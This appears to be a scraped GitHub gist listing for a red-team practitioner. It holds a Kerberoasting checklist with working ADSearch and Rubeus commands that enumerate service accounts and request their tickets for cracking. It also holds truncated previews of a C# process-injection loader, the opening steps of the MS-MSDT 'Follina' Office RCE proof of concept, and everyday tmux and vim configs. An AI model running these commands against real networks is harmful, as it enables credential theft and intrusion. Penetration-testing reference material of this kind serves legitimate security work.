# Red Team Checklist
## Kerberoasting
Find SPNs (can also be found from an ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName`
Roast individually
`C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:sqlsvc /nowrap`
@swtornio
swtornio / install.sh
Created October 14, 2024 14:01 — forked from ikr4-m/install.sh
Hyper-V Enhanced Session for Debian
```sh
#!/bin/sh
# This script is based on linux-vm-tools for Ubuntu 22.02.
# Thanks to https://github.com/Hinara/linux-vm-tools/ for the script.
# This script is for Ubuntu 22.04 Jammy Jellyfish to download and install XRDP+XORGXRDP via
# source.
#
# Major thanks to: http://c-nergy.be/blog/?p=11336 for the tips.
#
```
@swtornio
swtornio / tmux.conf
Created September 16, 2024 12:53
Basic tmux config with logging
```tmux
set -g history-limit 9999999
set -g mouse on
unbind -n MouseDrag1Pane
set-window-option -g mode-keys vi
set -g base-index 0 # Start window numbers at 0
# Log all panes by default to $HOME/tmux_logs
run-shell -b 'if [ ! -d "$HOME/tmux_logs" ]; then mkdir "$HOME/tmux_logs"; fi'
# Prefix + c: Enable logging by default when a new window is created
bind c new-window\; pipe-pane -o 'bash -c "while IFS= read -r line; do echo \"\$(date +%%Y%%m%%dT%%H%%M%%SZ%%z): \$line\"; done" >>$HOME/tmux_logs/"'%Y-%m-%d-%H:%M:%S'-win#I-pane#P-#W-#S-tmux.log"'
```
@swtornio
swtornio / DInjectQueuerAPC.cs
Created September 13, 2024 15:24 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
```
```vim
syntax on
filetype indent on
set number
set shiftwidth=4
set expandtab
set nowrap
```
@swtornio
swtornio / 2serv.py
Created February 15, 2023 19:29 — forked from phrawzty/2serv.py
simple python http server to dump request headers
```python
#!/usr/bin/env python2
import SimpleHTTPServer
import SocketServer
import logging
PORT = 8000
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
```
@swtornio
swtornio / gist:ab5940a309e9b105457813c8e4c5140c
Created December 9, 2022 20:59
proxy categorization URLS
Barracuda - http://www.barracudacentral.org/report/website-category/www.example.org
Bluecoat - https://sitereview.bluecoat.com/sitereview.jsp
Bright Cloud - https://www.brightcloud.com/tools/url-ip-lookup.php
CheckPoint - https://www.checkpoint.com/urlcat/
Cisco - Scansafe - https://securityhub.cisco.com/web/submited_urls
(ASCII-art banner reading "Hack Back!")
A DIY Guide
@swtornio
swtornio / ms-msdt.MD
Created May 31, 2022 12:04 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@swtornio
swtornio / boilerplate.py
Created May 13, 2022 11:47 — forked from notareverser/boilerplate.py
Boilerplate Python script
```python
#!/usr/bin/env python3
import argparse
import sys
import json
import logging
```